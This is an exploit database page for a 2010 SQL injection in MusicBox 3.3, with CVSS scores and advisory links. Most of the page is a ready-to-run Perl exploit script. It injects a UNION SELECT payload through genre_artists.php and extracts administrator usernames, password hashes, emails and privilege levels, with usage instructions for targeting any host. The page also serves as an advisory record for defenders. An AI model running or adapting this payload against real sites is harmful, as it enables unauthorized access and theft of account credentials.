MusicBox 3.3 remote SQL injection

2010-04-21 / 2010-04-22
Credit: Ctacok
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: MusicBox v 3.3 SQL INJECTION EXPLOIT # Date: 20.04.2010 # Author: Ctacok # Version: 3.3 # Tested on: Windows XP SP 2 # Code: #!/usr/bin/perl use LWP::Simple; print "\n"; print "##############################################################\n"; print "# MusicBox v 3.3 SQL INJECTION EXPLOIT #\n"; print "# Author: Ctacok (Russian) #\n"; print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n"; print "##############################################################\n"; print "\n Usage: exploit.pl [host] [path] "; print "\n EX : exploit.pl www.localhost.com /path/ \n\n"; print "\n userlevel 9 = SuperAdmin "; print "\n pass = md5($pass)"; if (@ARGV < 2) { exit; } $host=$ARGV[0]; $path=$ARGV[1]; $vuln = "-1+union+select+1,2,concat(0x3a3a3a,userid,0x3a,username,0x3a,password,0x3a,email,0x3a,userlevel,0x3a3a3a),4,5,6,7+from+users+"; $doc = get($host.$path."genre_artists.php?id=".$vuln."--+&by=ASC"); if ($doc =~ /:::(.+):(.+):(.+):(.+):(.+):::/){ print "\n[+] Admin id: : $1"; print "\n[+] Admin username: $2"; print "\n[+] Admin password: $3"; print "\n[+] Admin email: $4"; print "\n[+] Admin userlevel: $5"; }else{ print "\n My name is Fail, Epic Fail... \n" } _______________________________________________________________ ?????????? ???????: ?????? ???? ??????? ???????? ?? NextMail ??????????? ????? http://design2010.nextmail.ru

References:

http://xforce.iss.net/xforce/xfdb/57979
http://www.securityfocus.com/bid/39581
http://www.exploit-db.com/exploits/12303
http://secunia.com/advisories/39476
http://packetstormsecurity.org/1004-exploits/musicbox33-sql.txt
http://osvdb.org/63927


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top